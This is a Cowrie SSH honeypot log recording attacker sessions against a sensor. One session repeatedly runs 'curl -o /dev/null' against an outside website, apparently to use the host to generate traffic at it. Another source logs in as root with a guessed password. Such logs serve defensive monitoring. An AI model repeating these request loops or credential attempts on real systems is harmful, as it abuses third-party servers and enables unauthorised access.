{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.680731Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.681663Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.718006Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.719328Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.756275Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.757425Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.794264Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.795504Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.832631Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.834046Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.874644Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.875689Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.915054Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.916084Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.955969Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.957241Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:45.994295Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:45.995458Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.086601Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.088109Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":43170,"dst_ip":"1.2.3.4","dst_port":22,"session":"dac68f5d8d62","protocol":"ssh","message":"New connection: 186.225.142.90:43170 (1.2.3.4:22) [session: dac68f5d8d62]","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.104608Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.127433Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.128668Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.167712Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.169151Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.208158Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.208988Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.246871Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.248149Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.286072Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.287287Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.325562Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.326736Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.364356Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.365526Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.402780Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.403931Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.430768Z","src_ip":"186.225.142.90","session":"dac68f5d8d62"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.431383Z","src_ip":"186.225.142.90","session":"dac68f5d8d62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.440802Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.441873Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.649422Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.650570Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.692881Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.693941Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.733258Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.734319Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.772491Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.773521Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.811071Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.812059Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.854494Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.855542Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.902830Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.903901Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.942205Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.943518Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:46.980157Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:46.981216Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.017958Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.019086Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.056333Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.058417Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.095177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.096355Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.133498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.134559Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.274171Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.275288Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.380627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.381723Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.418770Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.419820Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.458437Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.459463Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.516211Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.516945Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.573740Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.574811Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.620509Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.621594Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.660066Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.661155Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.704229Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.705285Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.742786Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.743772Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.792399Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.793553Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.844231Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.845541Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.890298Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.891518Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:47.949613Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:47.950612Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.037326Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.038537Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.075469Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.077095Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.119621Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.120741Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.233945Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.235223Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.272269Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.273676Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.340996Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.342143Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.379768Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.380899Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.449996Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.451177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.489877Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.491193Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.login.success","username":"root","password":"09011997*$","message":"login attempt [root/09011997*$] succeeded","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.524240Z","src_ip":"186.225.142.90","session":"dac68f5d8d62"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.530507Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.531630Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.570466Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.571894Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.609411Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:46:48.610513Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:46:48.659870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
